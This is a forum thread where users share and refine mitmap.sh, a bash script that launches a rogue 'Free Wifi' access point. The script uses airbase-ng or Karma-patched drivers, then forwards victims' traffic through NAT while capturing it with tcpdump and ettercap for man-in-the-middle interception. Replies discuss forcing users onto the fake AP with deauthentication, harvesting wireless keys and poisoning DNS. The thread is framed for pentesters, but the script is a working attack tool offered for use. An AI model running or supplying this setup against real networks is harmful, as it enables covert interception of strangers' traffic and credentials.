Yes that is true indeed hm2075, my script is pure simplicity - but it could stand beside as an additional option for pentesters on the go.
I don't know, nevertheless, it is so simple that one could easily add the necessary functions manually
I think its too complicated for newbies to be messing around,
best way is not to post the script but to put into pastebin, only those that know with at least some understanding will use it
Yes that is true indeed hm2075, my script is pure simplicity - but it could stand beside as an additional option for pentesters on the go.
I don't know, nevertheless, it is so simple that one could easily add the necessary functions manually
- Poul Wittig
This is all I could do in 30 minutes, it should work as a skeleton for what you want to do, you could finish it if you like, sadly I have very little time today but I will see if tomorrow I can work on it or if you want you can improve your coding skills by finishing it, what do you think about my idea?
Code:#!/bin/bash #================================================= # # FILE: mitmap.sh # # USAGE: ./mitmap.sh <options> # # DESCRIPTION: Script to lunch fake ap for Man In The Middle Attacks # # OPTIONS: Wireless car supported by Aircrack-ng for injection. # File with MAC addresses for filtering connection # Madwifi Drives Patched with the DigiNinja Karma Patch # BUGS: Only has been tested with Atheros, Realteck L8187 and Ralink 2750 cards. # NOTES: Latest version of SVN of Aircrack-ng as whell as latest drivers must me used. # AUTHOR: Deathray and carlos_perez(at)darkoperator.com # VERSION: 0.1 # CREATED: 12/29/08 # REVISION: #================================================= #Initialize Wireless interface variable IW= #Initialize interface to be routed to variable IE= #Initialize mode variable MODE= #Initilize SSID variable SSID="Free Wifi" #Initialize Macfilter file Variable FILTER="/noexist" #Variable with number of arguments passed to the script NUM=$# #Variable with log file location for trobleshooting LOGFILE=/root/mitmap.log #Variable for log folder LOGFOLDER="/root/" A1="ath0" #Variable for dhcpd configuration file DHCPDCONF="/etc/dhcpd.conf" #Capture crtl-c and it will kill aproceed to clean up any process left trap cleanup INT #Usage funtion for printing the help message function usage () { echo "Scritp for launching Fake AP to perform Man in The Middle Attack" echo "Based on scritp and Tutorial by Deathrey at http://forums.remote-exploit.org" echo "Usage:" echo "./mitmap.sh -m <mode> -i <wireless interface> -o <internet interface> <options>" echo "" echo "Modes:" echo "" echo "ap :Access Point using Airbase-ng" echo "apf :Access Point using Airbase-ng and MAC Filtering" echo "apa :Access Point using Digininja patched Madwifi kernel modules" echo "apaf :Access Point using Digininja patched Madwifi Kernel modules and MAC filtering" echo "" echo "Options:" echo "" echo "-s <ssid> :SSID to use for the Fake AP" echo "-f <text file> :text file containing MAC addresses to use as filter one per line" echo "-d <dhcpd conf> :Dhcpd configuration file" echo "-h : This help message" } #Airbase-ng Karma style interface initialization function abngkinit () { if [ $IW == $A1 ]; then ifconfig $IW down >> $LOGFILE 2>&1 & wlanconfig ath0 destroy >> $LOGFILE 2>&1 & echo -e "\033[1;32mChanging MAC Address\033[1;37m" macchanger -A wifi0 airmon-ng start wifi0 >> $LOGFILE 2>&1 & sleep 2 else ifconfig $IW up >> $LOGFILE 2>&1 & echo -e "\033[1;32mChanging MAC Address\033[1;37m" macchanger -A $IW airmon-ng start $IW >> $LOGFILE 2>&1 & sleep 2 fi modprobe tun echo -e "\033[1;32mstarting fake ap\033[1;37m" airbase-ng -P -C 30 -e "$SSID" $IW >> $LOGFILE 2>&1 & #give enough time before next command for interface to come up #specialy on Virtual Machines with USB cards echo "This will take 15 seconds .............." #$IW = "at0" sleep 15 #changing MTU size for Interface echo -e "\033[1;32mChanging MTU Size for At0 to 1400\033[1;37m" ifconfig at0 mtu 1400 IW="at0" } #Airbase-ng Karma style interface initialization with MAC Address Filtering function abngkinitfiltered () { if [ $IW == $A1 ]; then ifconfig $IW down >> $LOGFILE 2>&1 & wlanconfig ath0 destroy >> $LOGFILE 2>&1 & echo -e "\033[1;32mChanging MAC Address\033[1;37m" macchanger -A wifi0 airmon-ng start wifi0 >> $LOGFILE 2>&1 & sleep 2 else ifconfig $IW up >> $LOGFILE 2>&1 & echo -e "\033[1;32mChanging MAC Address\033[1;37m" macchanger -A $IW airmon-ng start $IW >> $LOGFILE 2>&1 & sleep 2 fi modprobe tun echo -e "\033[1;32mstarting fake ap with filtering\033[1;37m" airbase-ng -P -C 30 -e "$SSID" --clients $FILTER $IW >> $LOGFILE 2>&1 & #give enough time before next command for interface to come up #specialy on Virtual Machines with USB cards echo "This will take 15 seconds .............." #$IW = "at0" sleep 15 #changing MTU size for Interface echo -e "\033[1;32mChanging MTU Size for At0 to 1400\033[1;37m" ifconfig at0 mtu 1400 IW="at0" } #DigiNinja Atheros Karma interface initialization function mdwfkinit () { #Based on HD original karmetasploit scripts find /proc/net -name 'ath?' | sed -e 's/.*ath/ath/g' | xargs -i wlanconfig {} destroy echo Master Mode: `wlanconfig ath0 create wlandev wifi0 wlanmode ap` macchanger -A ath0 # Enable KARMA mode iwpriv ath0 karma 1 if [ $? -ne 0 ] ; then echo -e "\033[1;31mThe Madwifi Drivers appear to not have the karma patch applied\033[1;37m" echo -e "\033[1;31mhttp://www.darkoperator.com/madwifi-r3726-Karma-Aircrack-ng-patched-hdm-i386-1.lzm\033[1;37m" cleanup else echo -e "\033[1;32mStarting Atheros Card in Karma Mode Succesful\033[1;37m" fi # Configure the interface iwconfig ath0 mode master iwconfig ath0 channel 6 iwconfig ath0 essid "$SSID" ifconfig ath0 up 10.0.0.1 netmask 255.255.255.0 } #DigiNinja Atheros Karma MAC Address Filtering function mdwfkinitfiltered () { if [ -e $FILTER ]; then echo -e "\033[1;32mStarting fake ap with MAC Filtering\033[1;37m" for M in `cat $FILTER`; do iwpriv ath0 addmac $M done iwpriv ath0 maccmd 1 else echo -e "\033[1;31mFilter File does not exist\033[1;37m" echo $FILTER #cleanup fi } #Router with NAT Initialization function routerinit () { #Clear any dhcp leases that might have been left behind echo > /var/state/dhcp/dhcpd.leases #start dhcpd daemon with special configuration file dhcpd -cf $DHCPDCONF $IW >> $LOGFILE 2>&1 & if [ $? -ne 0 ] ; then echo -e "\033[1;31mThe DHCPD server could not be started exiting\033[1;37m" cleanup else echo -e "\033[1;32mDHCPD started succesfully\033[1;37m" fi sleep 2 #capture all packets echo -e "\033[1;32mStarting Packet capture to /root/apmitm.cap\033[1;37m" tcpdump -ni $IW -s 0 -w /root/apmitm.cap >/dev/null 2>&1 & route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o $IE -j MASQUERADE echo "1" > /proc/sys/net/ipv4/ip_forward ettercap -T -q -p -i $IW && cleanup } #Cleanup of all running processes function cleanup () { iptables --flush iptables --table nat --flush iptables --delete-chain echo "0" > /proc/sys/net/ipv4/ip_forward killall -9 dhcpd tcpdump airbase-ng >> $LOGFILE 2>&1 & echo > /var/state/dhcp/dhcpd.leases airmon-ng stop $IW >> $LOGFILE if [ $MODE == "apa" ] || [$MODE == "apaf"; then iwpriv ath0 maccmd 1 >> $LOGFILE 2>&1 & fi exit 1 } #--------------------MAIN----------------------- while getopts ":m:i:f:s:e:" options; do case $options in m ) MODE=$OPTARG;; i ) IW=$OPTARG;; f ) FILTER=$OPTARG;; s ) SSID=$OPTARG;; o ) IE=$OPTARG;; h ) usage;; \? ) usage exit 1;; * ) usage exit 1;; esac done if [[ -n "$MODE" && -n "$IW" ]]; then case $MODE in ap) abngkinit routerinit;; apf) abngkinitfiltered routerinit;; apa) mdwfkinit routerinit;; apaf) mdwfkinit mdwfkinitfiltered routerinit;; esac else usage fi
Exciting to read as a lot of the stuff you have done I have always wondered how to do (: Although I am beginning to think that it may be a bit more complex than necessary. I think that there is more room for things to go wrong and it will be harder for people to troubleshoot when the script is as complex as it is. I don't know, I just think it will be a daunting task to get right. It would be great if it worked 100% for 99% of the people that actually will use it. But the question is how many people would bother?
I'm thinking of upgrading the original to script to do something like this:
Select rogue ap type:
1 Offensive AP ( airbase-ng -e "$ESSID" -P -C 30 -v $WIFACE & )
2 Non-Offensive AP ( airbase-ng -e "$ESSID" -v $WIFACE & )
3 Manual AP ( Configure airbase-ng options manually )
If that were to be implemented in a simple way I would be happy :P
- Poul Wittig
Sorry for overdoing it bro, I tried to ajust it to my own needs, different needs diferent approaches, I tend to write scrips and options as if I'm in the middle of an engagement and thinking of anything that I might need. As you will later see it's not that complex, I do put lots of checks and balances in my scripts. One thing to tecomend is the clean up, why? It might bite you any settings in routing or in iptables as you switch attacks. Looking fordward to your final script.
excellent work there, maybe throw in our wireless key harvester
hehehe
anyway we still haven't got deauth a user and force to connect to our ap function yet, i think this has already been mentioned on the airbase-ng tickets
When ettercap starts up it turns off any kernel forwarding unless you use the -u option for unoffensive mode.Originally posted by BadKarmaPR
echo "1" > /proc/sys/net/ipv4/ip_forward
ettercap -T -q -p -i $IW && cleanup
echo "1" > /proc/sys/net/ipv4/ip_forward
could some please explain what this step does? i am trying to replicate the script manually and i'm not sure what to do for this step...
patience is appreciated =]
If you want to use ettercap you should start it THEN enable forwarding. Ive had much better success doing that, becasue EC tries to forward for you then you can set everything right by echo "1" > /proc/sys/net/ipv4/ip_forward. I havnt tried the -u option yet hopefully that would do the same thing.
For all those folks out there having trouble trying to run the script, if you open up bash and put in each line yourself it is much easier to see what is and isnt working, also start wireshark. If you wireshark your TUN interface and the NIC connected to the internet you can watch the packet transfers (or lack there of) and diagnose alot of the problems. Its all about doing one thing at a time and trial and error, everyone has different software/hardware so these scripts arent going to work for many of you with out a little modification.
One last thing HM2075, ive been having some trouble getting that dnspoison program you used to work, are there any tuts online that you could point to? It seems a little crazy to have to setup a bind server to do a simple redirection, which is what Ive tried so far, and ettercaps dns spoof plugin is just crap.
Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."
Neo: "What if I take both?"
Morpheus: "Don't do that! You end up like Nick Nolte!"
Turns on IP forwarding on your box, so it will act as a router and forward packets.Originally Posted by benzslr123
Posting Permissions
